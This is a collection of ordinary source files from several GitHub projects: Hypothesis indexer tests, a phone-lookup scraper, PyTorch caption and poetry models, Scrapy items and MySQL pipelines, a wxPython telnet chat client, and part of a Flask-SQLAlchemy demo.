celery.request.es, "test-annotation-id", target_index="hypothesis-xyz123"
)
def test_during_reindex_deletes_from_new_index(
self, delete, celery, settings_service
):
settings_service.put("reindex.new_index", "hypothesis-xyz123")
indexer.delete_annotation("test-annotation-id")
delete.assert_any_call(
celery.request.es, "test-annotation-id", target_index="hypothesis-xyz123"
)
class TestReindexUserAnnotations:
def test_it_creates_batch_indexer(self, BatchIndexer, annotation_ids, celery):
userid = list(annotation_ids.keys())[0]
indexer.reindex_user_annotations(userid)
BatchIndexer.assert_any_call(
celery.request.db, celery.request.es, celery.request
)
def test_it_reindexes_users_annotations(self, BatchIndexer, annotation_ids):
userid = list(annotation_ids.keys())[0]
indexer.reindex_user_annotations(userid)
args, _ = BatchIndexer.return_value.index.call_args
actual = args[0]
expected = annotation_ids[userid]
assert sorted(expected) == sorted(actual)
@pytest.fixture
def annotation_ids(self, factories):
userid1 = "acct:<EMAIL>"
userid2 = "acct:<EMAIL>"
return {
userid1: [
a.id for a in factories.Annotation.create_batch(3, userid=userid1)
],
userid2: [
a.id for a in factories.Annotation.create_batch(2, userid=userid2)
],
}
class TestReindexAnnotationsInDateRange:
def test_it(self, BatchIndexer, celery, matching_annotations_ids):
indexer.reindex_annotations_in_date_range(
datetime.datetime.utcnow() - datetime.timedelta(days=7),
datetime.datetime.utcnow(),
)
BatchIndexer.assert_called_once_with(
celery.request.db, celery.request.es, celery.request,
)
BatchIndexer.return_value.index.assert_called_once_with(Any())
indexed_annotations = list(BatchIndexer.return_value.index.call_args[0][0])
assert sorted(indexed_annotations) == sorted(matching_annotations_ids)
@pytest.fixture(autouse=True)
def matching_annotations_ids(self, factories):
"""Annotations that're within the timeframe that we're reindexing."""
return [
annotation.id
for annotation in factories.Annotation.create_batch(
3, updated=datetime.datetime.utcnow() - datetime.timedelta(days=3)
)
]
@pytest.fixture(autouse=True)
def not_matching_annotations(self, factories):
"""Annotations that're outside the timeframe that we're reindexing."""
before_annotations = factories.Annotation.build_batch(
3, updated=datetime.datetime.utcnow() - datetime.timedelta(days=14)
)
after_annotations = factories.Annotation.build_batch(
3, updated=datetime.datetime.utcnow() + datetime.timedelta(days=14)
)
return before_annotations + after_annotations
pytestmark = pytest.mark.usefixtures("settings_service")
@pytest.fixture(autouse=True)
def BatchIndexer(patch):
return patch("h.tasks.indexer.BatchIndexer")
@pytest.fixture(autouse=True)
def celery(patch, pyramid_request):
cel = patch("h.tasks.indexer.celery")
cel.request = pyramid_request
return cel
@pytest.fixture(autouse=True)
def delete(patch):
return patch("h.tasks.indexer.delete")
@pytest.fixture(autouse=True)
def index(patch):
return patch("h.tasks.indexer.index")
@pytest.fixture
def pyramid_request(pyramid_request):
pyramid_request.es = mock.Mock()
return pyramid_request
@pytest.fixture
def settings_service(pyramid_config):
service = FakeSettingsService()
pyramid_config.register_service(service, name="settings")
return service
@pytest.fixture(autouse=True)
def storage(patch):
return patch("h.tasks.indexer.storage")
``` |
{
"source": "13636472690/Robot_Cherry",
"score": 3
} |
#### File: code/modules/phone.py
```python
from bs4 import BeautifulSoup
import requests
def check_phone(content):  # check whether the text contains a phone number
    for i in range(0, len(content)):
        # TODO: also reject 11-digit runs that are not valid mobile numbers 2017_07_24
        if content[i:i + 11].isdigit() and content[i] == '1':
            return content[i:i + 11]
def ask_phone(p):  # TODO(2017_07_20): refactor this function further
    url = 'http://www.ip138.com:8080/search.asp?mobile=%s&action=mobile' % p
    r = requests.get(url)
    r.encoding = 'GBK'
    soup = BeautifulSoup(r.text, "html.parser")
    # positions 8/13/15/17/19 of the stripped strings hold number, region, card type, area code and postcode
    strings = [repr(s) for s in soup.stripped_strings]
    fields = [strings[8], strings[13], strings[15], strings[17], strings[19]]
    info = '手机号:' + fields[0] + '\n' + '归属地:' + fields[1] + '\n' + '卡类型:' + fields[2] + '\n' + '区号:' + \
           fields[3] + '\n' + '邮编:' + fields[4]
    info = info.replace('\\xa0', ' ')  # strip the escaped non-breaking spaces
    info = info.replace("'", '')  # strip the quotes left behind by repr()
    return info
``` |
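The TODO in `check_phone` notes that any 11-digit run starting with `1` is accepted even when it is not a plausible mobile number. A hedged sketch of a stricter check with a regular expression; the accepted prefix range (`1` followed by `3`–`9`) is an assumption about which Chinese mobile prefixes should pass.
```python
# Sketch addressing check_phone's TODO with a stricter pattern. The prefix range
# 1[3-9] is an assumption; adjust it to the carriers that should be accepted.
import re
PHONE_RE = re.compile(r'(?<!\d)1[3-9]\d{9}(?!\d)')  # 11 digits, not embedded in a longer run
def check_phone_strict(content):
    match = PHONE_RE.search(content)
    return match.group(0) if match else None
print(check_phone_strict("call me at 13912345678 please"))  # 13912345678
print(check_phone_strict("order id 12345678901"))           # None (prefix 12 is rejected)
```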
{
"source": "1364354238/PYTORCH_LEARNING",
"score": 2
} |
#### File: PYTORCH_LEARNING/chapter10-图像描述(Image Caption)/model.py
```python
import torch as t
from torch import nn
from torch.nn.utils.rnn import pack_padded_sequence
import torchvision as tv
from torchvision import transforms
from utils.beam_search import CaptionGenerator
import time
from itertools import chain
class CaptionModel(nn.Module):
def __init__(self,opt,word2ix,ix2word):
super(CaptionModel, self).__init__()
self.ix2word = ix2word
self.word2ix = word2ix
self.opt = opt
self.fc = nn.Linear(2048,opt.rnn_hidden)
self.rnn = nn.LSTM(opt.embedding_dim,opt.rnn_hidden,num_layers=opt.num_layers)
self.classifier = nn.Linear(opt.rnn_hidden,len(word2ix))
self.embedding = nn.Embedding(len(word2ix),opt.embedding_dim)
        if opt.share_embedding_weights:
            # weight tying: reuse the embedding matrix as the classifier weights
            # (only possible when rnn_hidden == embedding_dim)
            self.classifier.weight = self.embedding.weight
def forward(self,img_feats,captions,lengths):
embeddings = self.embedding(captions)
# img_feats是2048维的向量,通过全连接层转为256维的向量,和词向量一样
img_feats = self.fc(img_feats).unsqueeze(0)
# 将img_feats看成第一个词的词向量
embeddings = t.cat([img_feats,embeddings],0)
# PackedSequence
packed_embeddings = pack_padded_sequence(embeddings,lengths)
outputs,state = self.rnn(packed_embeddings)
# lstm的输出作为特征用来分类预测下一个词的序号
# 因为输入是PackedSequence,所以输出的output也是PackedSequence
# PackedSequence第一个元素是Variable,第二个元素是batch_sizes,
# 即batch中每个样本的长度
pred = self.classifier(outputs[0])
return pred,state
def generate(self, img, eos_token='</EOS>',
beam_size=3,
max_caption_length=30,
length_normalization_factor=0.0):
'''
        Generate a caption for the image; beam search is used to obtain a better description.
'''
cap_gen = CaptionGenerator(embedder=self.embedding,
rnn=self.rnn,
classifier=self.classifier,
eos_id=self.word2ix[eos_token],
beam_size=beam_size,
max_caption_length=max_caption_length,
length_normalization_factor=length_normalization_factor)
if next(self.parameters()).is_cuda:
img = img.cuda()
img = t.autograd.Variable(img.unsqueeze(0), volatile=True)
img = self.fc(img).unsqueeze(0)
sentences, score = cap_gen.beam_search(img)
sentences = [' '.join([self.ix2word[idx] for idx in sent])
for sent in sentences]
return sentences
def states(self):
opt_state_dict = {attr:getattr(self.opt,attr)
for attr in dir(self.opt)
if not attr.startswith('__') }
return {
'state_dict':self.state_dict(),
'opt':opt_state_dict
}
def save(self,path=None,**kwargs):
if path is None:
path = '{prefix}_{time}'.format(prefix = self.opt.prefix,
time=time.strftime('%m%d_%H%M'))
states = self.states()
states.update(kwargs)
t.save(states, path)
return path
def load(self,path,load_opt=False):
data = t.load(path,map_location = lambda s,l :s)
state_dict = data['state_dict']
self.load_state_dict(state_dict)
if load_opt:
for k,v in data['opt'].items():
setattr(self.opt,k,v)
return self
def get_optimizer(self,lr):
return t.optim.Adam(self.parameters(),lr=lr)
```
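`forward()` above projects the 2048-d image feature to the embedding size, prepends it as a pseudo first token and relies on `pack_padded_sequence` to drop the padded timesteps. The toy snippet below only illustrates that packing behaviour with random tensors; all sizes are made up and nothing touches the caption data.
```python
# Toy illustration of the pack_padded_sequence trick used in CaptionModel.forward;
# every dimension here is arbitrary.
import torch
from torch import nn
from torch.nn.utils.rnn import pack_padded_sequence
seq_len, batch, embed, hidden = 5, 3, 8, 16
embeddings = torch.randn(seq_len, batch, embed)  # (seq_len, batch_size, embedding_dim)
lengths = [5, 3, 2]  # true lengths, sorted in descending order
packed = pack_padded_sequence(embeddings, lengths)
print(packed.data.shape)   # torch.Size([10, 8]) -> 5+3+2 real timesteps, padding dropped
print(packed.batch_sizes)  # tensor([3, 3, 2, 1, 1])
rnn = nn.LSTM(embed, hidden)
outputs, state = rnn(packed)
print(outputs.data.shape)  # torch.Size([10, 16]) -> one hidden vector per real timestep
```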
#### File: PYTORCH_LEARNING/chapter9-神经网络写诗(CharRNN)/model.py
```python
import torch
import torch.nn as nn
from torch.autograd import Variable
import torch.nn.functional as F
class PoetryModel(nn.Module):
def __init__(self, vocab_size, embedding_dim, hidden_dim):
super(PoetryModel, self).__init__()
self.hidden_dim = hidden_dim
self.embeddings = nn.Embedding(vocab_size, embedding_dim)
self.lstm = nn.LSTM(embedding_dim, self.hidden_dim,num_layers=2)
self.linear1 = nn.Linear(self.hidden_dim, vocab_size)
def forward(self, input,hidden=None):
seq_len,batch_size = input.size()
if hidden is None:
# h_0 = 0.01*torch.Tensor(2, batch_size, self.hidden_dim).normal_().cuda()
# c_0 = 0.01*torch.Tensor(2, batch_size, self.hidden_dim).normal_().cuda()
h_0 = input.data.new(2, batch_size, self.hidden_dim).fill_(0).float()
c_0 = input.data.new(2, batch_size, self.hidden_dim).fill_(0).float()
h_0,c_0 = Variable(h_0),Variable(c_0)
else:
h_0,c_0 = hidden
# size: (seq_len,batch_size,embeding_dim)
embeds = self.embeddings(input)
# output size: (seq_len,batch_size,hidden_dim)
output, hidden = self.lstm(embeds, (h_0,c_0))
# size: (seq_len*batch_size,vocab_size)
output = self.linear1(output.view(seq_len*batch_size, -1))
return output,hidden
``` |
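At inference time a model like this is driven one character per step, feeding each prediction back in together with the carried-over `(h, c)` state. A hedged sketch of a greedy generation loop; the `word2ix`/`ix2word` mappings, the trained model and the `<EOP>` end token are assumptions and are not loaded here.
```python
# Sketch of greedy generation with PoetryModel: one character per step, hidden
# state carried forward. word2ix/ix2word, a trained model and the <EOP> token are assumed.
import torch
from torch.autograd import Variable
def generate(model, start_char, word2ix, ix2word, max_len=48, end_token='<EOP>'):
    result = [start_char]
    inp = Variable(torch.LongTensor([[word2ix[start_char]]]))  # shape (seq_len=1, batch=1)
    hidden = None
    for _ in range(max_len):
        output, hidden = model(inp, hidden)
        top_index = output.data[0].topk(1)[1][0].item()  # greedy pick of the next character
        char = ix2word[top_index]
        if char == end_token:
            break
        result.append(char)
        inp = Variable(inp.data.new([[top_index]]))  # feed the prediction back in
    return ''.join(result)
```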
{
"source": "1365102044/lwscrapy",
"score": 2
} |
#### File: lwscrapy/lwscrapy/items.py
```python
import scrapy
from scrapy.loader import ItemLoader
from scrapy.loader.processors import TakeFirst, MapCompose
from w3lib.html import remove_tags
class LwscrapyItem(scrapy.Item):
# define the fields for your item here like:
pass
class GuaziItem(scrapy.Item):
name = scrapy.Field()
price = scrapy.Field()
time_s = scrapy.Field()
distance = scrapy.Field()
# 移除特定字符
def remove_ivaliedchar(str):
return str.replace('\u200b', '')
# 不做整体出来(既是不再取列表中的第一个非空值了)
def return_value(value):
return value
# 字符拼接
def add_baseurl(value):
return 'http://yao.xywy.com'+value
def to_list(value):
list = []
list.append(value)
return list
# 从图片url中切出特殊标识当做图片名字
def get_image_name(value):
return value.split('/')[-2]
# 定义一个默认输出的
class ArticalItemLoader(ItemLoader):
# 实现之前的extract_first()方法
# 这里只是重载这个属性,设置为只选取第一个值
default_output_processor = TakeFirst()
class MedicaldataItem(scrapy.Item):
# 药名
name = scrapy.Field()
# 生成企业
company = scrapy.Field()
# 功能
function = scrapy.Field(
input_processor = MapCompose(remove_tags, remove_ivaliedchar)
)
# 详情URL
deatil_url = scrapy.Field(
input_processor = MapCompose(add_baseurl)
)
# 审批编号
approval_num = scrapy.Field()
# 相关疾病
related_disease = scrapy.Field()
# 图片url
image_url = scrapy.Field(
# 维持该字段是数组形式(图片下载管道中间件需要)
input_processor = MapCompose(to_list,),
# 数据输出格式,使用不做特殊处理(屏蔽掉:取第一个非空数据/TakeFirst())
output_processor = MapCompose(return_value)
)
# 图片名
image_name = scrapy.Field(
input_processor = MapCompose(get_image_name)
)
# 天猫 数据
class TianMaoDataItemLoader(ItemLoader):
default_output_processor = TakeFirst()
class TianMaoDataItem(scrapy.Item):
title = scrapy.Field()
sales = scrapy.Field()
price = scrapy.Field()
deatilurl = scrapy.Field()
shopname = scrapy.Field()
class JingDongDataItemLoader(ItemLoader):
default_output_processor = TakeFirst()
class JingDongDataItem(scrapy.Item):
title = scrapy.Field()
price = scrapy.Field()
sku_id = scrapy.Field()
deatilurl = scrapy.Field()
commentsnum = scrapy.Field()
class JdCommentsItem(scrapy.Item):
sku_id = scrapy.Field()
content = scrapy.Field()
creationTime = scrapy.Field()
productColor = scrapy.Field()
productSize = scrapy.Field()
```
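The input/output processors above only run when items are populated through an `ItemLoader`. A hedged sketch of filling `MedicaldataItem` inside a spider callback; the XPath expressions and the `response.meta` key are placeholders rather than selectors from the real spider.
```python
# Illustrative use of the loaders above inside a spider callback; the selectors
# are placeholders, only the loader mechanics matter here.
from lwscrapy.items import MedicaldataItem, ArticalItemLoader
def parse_drug(self, response):
    loader = ArticalItemLoader(item=MedicaldataItem(), response=response)
    loader.add_xpath('name', '//h1/text()')
    loader.add_xpath('function', '//div[@class="function"]')  # remove_tags runs on input
    loader.add_xpath('deatil_url', '//a[@class="detail"]/@href')  # add_baseurl prepends the host
    loader.add_value('image_url', response.meta.get('image_url'))  # kept as a list for the image pipeline
    yield loader.load_item()  # TakeFirst() yields scalars except where overridden
```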
#### File: lwscrapy/lwscrapy/pipelines.py
```python
import pymysql
from twisted.enterprise import adbapi
from pymysql import cursors
from lwscrapy.items import MedicaldataItem, JdCommentsItem, JingDongDataItem
from scrapy.pipelines.images import ImagesPipeline
from scrapy import Request
class lwBasePipelines(object):
def __init__(self):
dbparams = {
'host': '127.0.0.1',
'port': 3306,
'user': 'root',
'password': '<PASSWORD>',
'database': 'lwqdata',
'charset': 'utf8',
'cursorclass': cursors.DictCursor
}
self.dbpool = adbapi.ConnectionPool('pymysql', **dbparams)
class lwJDPipelines(object):
def __init__(self):
dbparams = {
'host': '127.0.0.1',
'port': 3306,
'user': 'root',
'password': '<PASSWORD>',
'database': 'lwqdata',
'charset': 'utf8',
'cursorclass': cursors.DictCursor
}
self.dbpool = adbapi.ConnectionPool('pymysql', **dbparams)
def process_item(self, item, spider):
        if spider.name != 'jdspider':
return item
# 使用twisted将MySQL插入变成异步执行。通过连接池执行具体的sql操作,返回一个对象
query = self.dbpool.runInteraction(self.do_insert, item)
# 添加异常处理
query.addCallback(self.handle_error)
return item
def do_insert(self, cursor, item):
sql = ''
values = []
if isinstance(item, JingDongDataItem):
sql = '''
insert into jd_t (title, price, sku_id, deatilurl, commentsnum) values (%s, %s, %s, %s, %s)
'''
values = (item['title'], item['price'], item['sku_id'], item['deatilurl'], item['commentsnum'])
elif isinstance(item, JdCommentsItem):
sql = '''
insert into jd_comment_t (sku_id, content, creationTime, productColor, productSize) values (%s, %s, %s, %s, %s)
'''
values = (item['sku_id'], item['content'], item['creationTime'], item['productColor'], item['productSize'])
else:
return item
# print('*' * 30)
# print(sql)
cursor.execute(sql, values)
def handle_error(self, failure):
if failure:
print(failure)
class lwTianMaoPipelines(object):
def __init__(self):
dbparams = {
'host': '127.0.0.1',
'port': 3306,
'user': 'root',
'password': '<PASSWORD>',
'database': 'lwqdata',
'charset': 'utf8',
'cursorclass': cursors.DictCursor
}
self.dbpool = adbapi.ConnectionPool('pymysql', **dbparams)
def process_item(self, item, spider):
        if spider.name != 'tianmaospider':
return item
# 使用twisted将MySQL插入变成异步执行。通过连接池执行具体的sql操作,返回一个对象
query = self.dbpool.runInteraction(self.do_insert, item)
# 添加异常处理
query.addCallback(self.handle_error)
return item
def do_insert(self, cursor, item):
sql = '''
insert into tianmao_t (title, sales, price, shopname) values (%s, %s, %s, %s)
'''
values = (item['title'], item['sales'], item['price'], item['shopname'])
# print('*' * 30)
# print(sql)
cursor.execute(sql, values)
def handle_error(self, failure):
if failure:
print(failure)
class ImagesnamePipelines(ImagesPipeline):
# 1看源码可以知道,这个方法只是遍历出我们指定的图片字段,是个数组,然后一个一个请求
def get_media_requests(self, item, info):
if isinstance(item, MedicaldataItem):
# 循环每一张图片地址下载,若传过来的不是集合则无需循环直接yield
for imageurl in item['image_url']:
print('imagepipelines.imageurl:')
print(imageurl)
# meta里面的数据是从spider获取,然后通过meta传递给下面方法:file_path
yield Request(imageurl, meta={'name': item['image_name']})
else:
return item
# 2重命名,若不重写这函数,图片名为哈希,就是一串乱七八糟的名字
def file_path(self, request, response=None, info=None):
filename = request.meta['name']
# 注意,需要拼接后缀,不然文件格式不是图片,无法打开
return filename+'.jpg'
#3这个是请求完成之后走的方法,我们可以得到请求的url和存放的地址
def item_completed(self, results, item, info):
pass
def lwstring(self, str):
return pymysql.escape_string(str)
class LwscrapyPipeline(object):
# def __init__(self,):
# self.conn = pymysql.connect(host='127.0.0.1',
# port=3306,
# user='root',
# passwd='<PASSWORD>',
# db='medicaldata',
# charset='utf8',
# use_unicode = True)
# self.cursor = self.conn.cursor()
#
# # 必需函数
# def process_item(self, item, spider):
# # print(item)
# sql = '''
# insert into medicaldata_t (name, company, deatil_url, approval_num, related_disease, func,image_url,image_name) values (%s, %s, %s, %s, %s, %s, %s, %s) ON duplicate key update name = values(name)
# '''
# function = self.conn.escape_string(item['function'])
# # print('function:'+function)
# # function = function.replace('\u200b', '')
# # print('function:' + function)
# values = (item['name'], item['company'], item['deatil_url'], item['approval_num'], item['related_disease'], function, item['image_url'][0], item['image_name'])
# # print(sql)
# print(values)
# self.cursor.execute(sql, values)
# self.conn.commit()
#
# # 返回是为了把数据传给下一个管道
# return item
#
# def close_spider(self, spider):
# self.cursor.close()
# self.conn.close()
# 采用异步数据库连接池的方法
def __init__(self):
dbparams = {
'host': '127.0.0.1',
'port': 3306,
'user': 'root',
'password': '<PASSWORD>',
'database': 'medicaldata',
'charset': 'utf8',
'cursorclass': cursors.DictCursor
}
self.dbpool = adbapi.ConnectionPool('pymysql', **dbparams)
# self._sql = None
# @property
# def sql(self):
# if not self._sql:
# self.sql = '''
# insert into medicaldata_t (name, company, deatil_url, approval_num, related_disease, func,image_url,image_name) values (%s, %s, %s, %s, %s, %s, %s, %s) ON duplicate key update name = values(name)
# '''
# return self._sql
# return self._sql
# @classmethod
# def form_settings(cls, settings):
#
# adbparams = dict(
# host=settings('MYSQL_HOST'),
# database=settings("MYSQL_DATABASE"),
# user=settings("MYSQL_USER"),
# password=settings("<PASSWORD>"),
# port=settings("MYSQL_PORT"),
# cursorclass=pymysql.cursors.DictCursor, #指定cursor类型
# )
# # 连接数据池ConnectionPool,使用pymysql或者Mysqldb连接
# dbpool = adbapi.ConnetionPool('pymysql', **adbparams)
#
# return cls(dbpool)
# def open_spider(self, spider):
# self.db = pymysql.connect(self.host, self.user, self.password,self.database, charset='utf8', port=self.port)
# print('*'*10+'open')
# print(self.db)
# self.cursor = self.db.cursor()
#
# def close_spider(self, spider):
# print('*'*10+'close')
# self.cursor.close()
# self.db.close()
def process_item(self, item, spider):
        if spider.name != 'lw_medicaldataspider':
return item
# 使用twisted将MySQL插入变成异步执行。通过连接池执行具体的sql操作,返回一个对象
query = self.dbpool.runInteraction(self.do_insert, item)
# 添加异常处理
query.addCallback(self.handle_error)
return item
def do_insert(self, cursor, item):
sql = '''
insert into medicaldata_t (name, company, deatil_url, approval_num, related_disease, func,image_url,image_name) values (%s, %s, %s, %s, %s, %s, %s, %s) ON duplicate key update name = values(name)
'''
values = (item['name'], item['company'], item['deatil_url'], item['approval_num'], item['related_disease'], item['function'], item['image_url'][0], item['image_name'])
print('*' * 30)
print(sql)
cursor.execute(sql, values)
def handle_error(self, failure):
if failure:
print(failure)
```
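None of these pipeline classes run until they are enabled in the project settings, and each `process_item` also guards on `spider.name`, so several can be enabled at once. A sketch of the corresponding `settings.py` entry; the priority numbers are arbitrary and `IMAGES_STORE` is a placeholder path required by the image pipeline.
```python
# Possible settings.py wiring for the pipelines above; lower priority numbers run first.
ITEM_PIPELINES = {
    'lwscrapy.pipelines.ImagesnamePipelines': 200,  # download and rename images first
    'lwscrapy.pipelines.LwscrapyPipeline': 300,     # medical data -> MySQL
    'lwscrapy.pipelines.lwTianMaoPipelines': 310,   # Tmall data -> MySQL
    'lwscrapy.pipelines.lwJDPipelines': 320,        # JD items and comments -> MySQL
}
IMAGES_STORE = 'images'  # required by ImagesPipeline; placeholder path
```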
#### File: lwscrapy/spiders/renren.py
```python
import scrapy
class RenrenSpider(scrapy.Spider):
name = 'renren'
    allowed_domains = ['renren.com', 'httpbin.org', 'www.baidu.com']  # allowed_domains takes bare domains, not URLs with paths
start_urls = ['http://renren.com/']
# 重写 自定义开始请求
# def start_requests(self):
# url = 'http://www.renren.com/PLogin.do'
# data = {'email': '<EMAIL>',
# 'password': '<PASSWORD>'}
# request = scrapy.FormRequest(url=url, formdata=data, callback=self.login_prase)
# yield request
#
# def login_prase(self, response):
# print(response.text)
# with open('login_res.html', 'w', encoding='utf-8') as ft:
# ft.write(response.text)
# 测试 动态请求头
def start_requests(self):
# url = 'httpbin.org/user-agent'
url = 'http://www.baidu.com'
request = scrapy.Request(url = url, callback = self.res_prase)
yield request
def res_prase(self,response):
print(response.text)
``` |
{
"source": "13659831387/RoomSpeech",
"score": 2
} |
#### File: 13659831387/RoomSpeech/client.py
```python
import wx
import telnetlib
from time import sleep
import _thread as thread
from chatbot import baidu_api2, chatbot, tuling, play_mp3, remove_voice, getText
from config import BOT, default_server, VOICE_SWITCH
from recorder import *
import threading
bot_use = BOT
class LoginFrame(wx.Frame):
"""
登录窗口
"""
def __init__(self, parent, id, title, size):
# 初始化,添加控件并绑定事件
wx.Frame.__init__(self, parent, id, title)
self.SetSize(size)
self.Center()
self.serverAddressLabel = wx.StaticText(self, label="Server Address", pos=(15, 40), size=(120, 25))
self.userNameLabel = wx.StaticText(self, label="UserName", pos=(45, 90), size=(120, 25))
self.serverAddress = wx.TextCtrl(self, value=default_server,
pos=(120, 37), size=(150, 25), style=wx.TE_PROCESS_ENTER)
self.userName = wx.TextCtrl(self, pos=(120, 87), size=(150, 25), style=wx.TE_PROCESS_ENTER)
self.loginButton = wx.Button(self, label='Login', pos=(50, 145), size=(90, 30))
self.exitButton = wx.Button(self, label='Exit', pos=(180, 145), size=(90, 30))
# 绑定登录方法
self.loginButton.Bind(wx.EVT_BUTTON, self.login)
# 绑定退出方法
self.exitButton.Bind(wx.EVT_BUTTON, self.exit)
# 服务器输入框Tab事件
self.serverAddress.SetFocus()
self.Bind(wx.EVT_TEXT_ENTER, self.usn_focus, self.serverAddress)
# 用户名回车登录
self.Bind(wx.EVT_TEXT_ENTER, self.login, self.userName)
self.Show()
# 回车调到用户名输入栏
def usn_focus(self, event):
self.userName.SetFocus()
def login(self, event):
# 登录处理
try:
serverAddress = self.serverAddress.GetLineText(0).split(':')
con.open(serverAddress[0], port=int(serverAddress[1]), timeout=10)
response = con.read_some()
if response != b'Connect Success':
self.showDialog('Error', 'Connect Fail!', (200, 100))
return
con.write(('login ' + str(self.userName.GetLineText(0)) + '\n').encode("utf-8"))
response = con.read_some()
if response == b'UserName Empty':
self.showDialog('Error', 'UserName Empty!', (200, 100))
elif response == b'UserName Exist':
self.showDialog('Error', 'UserName Exist!', (200, 100))
else:
self.Close()
ChatFrame(None, 2, title='当前用户:'+str(self.userName.GetLineText(0)), size=(515, 400))
except Exception:
self.showDialog('Error', 'Connect Fail!', (95, 20))
def exit(self, event):
self.Close()
# 显示错误信息对话框
def showDialog(self, title, content, size):
dialog = wx.Dialog(self, title=title, size=size)
dialog.Center()
wx.StaticText(dialog, label=content)
dialog.ShowModal()
class ChatFrame(wx.Frame):
"""
聊天窗口
"""
def __init__(self, parent, id, title, size):
# 初始化,添加控件并绑定事件
wx.Frame.__init__(self, parent, id, title, style=wx.SYSTEM_MENU | wx.CAPTION | wx.CLOSE_BOX |
wx.DEFAULT_FRAME_STYLE)
self.SetSize(size)
self.Center()
self.chatFrame = wx.TextCtrl(self, pos=(5, 5), size=(490, 310), style=wx.TE_MULTILINE | wx.TE_READONLY)
self.sayButton = wx.Button(self, label="Say", pos=(5, 320), size=(58, 25))
self.message = wx.TextCtrl(self, pos=(65, 320), size=(240, 25), style=wx.TE_PROCESS_ENTER)
self.sendButton = wx.Button(self, label="Send", pos=(310, 320), size=(58, 25))
self.usersButton = wx.Button(self, label="Users", pos=(373, 320), size=(58, 25))
self.closeButton = wx.Button(self, label="Close", pos=(436, 320), size=(58, 25))
self.sendButton.Bind(wx.EVT_BUTTON, self.send) # 发送按钮绑定发送消息方法
self.message.SetFocus() # 输入框回车焦点
self.sayButton.Bind(wx.EVT_LEFT_DOWN, self.sayDown) # SAY按钮按下
self.sayButton.Bind(wx.EVT_LEFT_UP, self.sayUp) # Say按钮弹起
self.Bind(wx.EVT_TEXT_ENTER, self.send, self.message) # 回车发送消息
self.usersButton.Bind(wx.EVT_BUTTON, self.lookUsers) # Users按钮绑定获取在线用户数量方法
self.closeButton.Bind(wx.EVT_BUTTON, self.close) # 关闭按钮绑定关闭方法
treceive = threading.Thread(target=self.receive) # 接收信息线程
treceive.start()
self.ShowFullScreen(True) # 全屏
self.Show()
def sayDown(self, event):
trecording = threading.Thread(target=recording)
trecording.start()
def sayUp(self, event):
sayText = getText(r"E:\speechRoom\voice_say\say_voice.wav")
self.message.AppendText(str(sayText))
self.send(self)
def send(self, event):
# 发送消息
message = str(self.message.GetLineText(0)).strip()
global bot_use
if message != '':
if message == "chatbot":
bot_use = "ChatBot"
self.message.Clear()
                con.write(('noone_say You have switched to ChatBot-Chat' + '\n').encode("utf-8"))
return
elif message == "tuling":
bot_use = "TuLing"
self.message.Clear()
                con.write(('noone_say You have switched to TuLing-Chat' + '\n').encode("utf-8"))
return
elif message == "user":
bot_use = "User"
self.message.Clear()
                con.write(('noone_say You have switched to User-Chat' + '\n').encode("utf-8"))
return
con.write(('say ' + message + '\n').encode("utf-8"))
self.message.Clear()
# 机器人回复
if bot_use == "ChatBot":
answer = chatbot(message)
con.write(('chatbot_say ' + answer + '\n').encode("utf-8"))
elif bot_use == "TuLing":
answer = tuling(message)
con.write(('tuling_say ' + answer + '\n').encode("utf-8"))
elif bot_use == "User":
return
if VOICE_SWITCH:
# 写本地音乐文件
baidu_api2(answer)
# 新建线程播放音乐
tplay_mp3 = threading.Thread(target=play_mp3)
tplay_mp3.start()
# thread.start_new_thread(play_mp3, ())
return
def lookUsers(self, event):
# 查看当前在线用户
con.write(b'look\n')
def close(self, event):
# 关闭窗口
tremove_voice = threading.Thread(target=remove_voice)
tremove_voice.start()
# thread.start_new_thread(remove_voice, ())
con.write(b'logout\n')
con.close()
self.Close()
def receive(self):
        # Receive messages pushed by the server
        while True:
            sleep(1)
            result = con.read_very_eager()
            if result:
                # telnetlib returns bytes under Python 3; decode before displaying
                self.chatFrame.AppendText(result.decode("utf-8"))
def saytime(self):
i = 0
while True:
self.chatFrame.AppendText('正在录音...' + str(i) + '秒\n')
sleep(1)
i = i + 1
if __name__ == '__main__':
app = wx.App()
con = telnetlib.Telnet()
LoginFrame(None, -1, title="Login", size=(320, 250))
app.MainLoop()
``` |
{
"source": "1366560t/helloflask",
"score": 2
} |
#### File: demos/database/app.py
```python
import os
import sys
import click
from flask import Flask
from flask import redirect, url_for, abort, render_template, flash
from flask_sqlalchemy import SQLAlchemy
from flask_wtf import FlaskForm
from wtforms import SubmitField, TextAreaField
from wtforms.validators import DataRequired
# sqlite URI compatible
WIN = sys.platform.startswith('win')
if WIN: # 在Windows系统下的URI中的斜线数量为3个
prefix = 'sqlite:///'
else: # SQLite的数据库URI在Linux或macOS系统下的斜线数量是4个
prefix = 'sqlite:////'
app = Flask(__name__)
app.jinja_env.trim_blocks = True
app.jinja_env.lstrip_blocks = True
app.config['SECRET_KEY'] = os.getenv('SECRET_KEY', 'secret string')
# 数据库的URI通过配置变量SQLALCHEMY_DATABASE_URI设置
# 用app.root_path来定位数据库文件的路径,并将数据库文件命名为data.db
app.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DATABASE_URL', prefix + os.path.join(app.root_path, 'data.db'))
# 事件通知系统 决定是否追踪对象的修改
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
# handlers
@app.shell_context_processor
def make_shell_context():
return dict(db=db, Note=Note, Author=Author, Article=Article, Writer=Writer, Book=Book,
Singer=Singer, Song=Song, Citizen=Citizen, City=City, Capital=Capital,
Country=Country, Teacher=Teacher, Student=Student, Post=Post, Comment=Comment, Draft=Draft)
@app.cli.command() # 自定义flask命令
@click.option('--drop', is_flag=True, help='Create after drop.')
def initdb(drop):
"""Initialize the database.初始化数据库"""
if drop:
db.drop_all() # 调用db.drop_all()方法删除数据库和表
db.create_all() # 调用db.create_all()方法创建
click.echo('Initialized database.')
# Forms
class NewNoteForm(FlaskForm):
body = TextAreaField('Body', validators=[DataRequired()])
submit = SubmitField('Save')
class EditNoteForm(FlaskForm):
body = TextAreaField('Body', validators=[DataRequired()])
submit = SubmitField('Update')
class DeleteNoteForm(FlaskForm):
submit = SubmitField('Delete')
# Models 定义Note模型
class Note(db.Model):
# 表的字段(列)由db.Column类的实例表示 db.Integer的id字段 存储整型
id = db.Column(db.Integer, primary_key=True)
# 类型为db.Text的body列 存储文本
body = db.Column(db.Text)
# optional 可选的 __repr__()方法会返回一条类似“<模型类名主键值>”的字符串
def __repr__(self):
return '<Note %r>' % self.body
@app.route('/')
def index():
form = DeleteNoteForm()
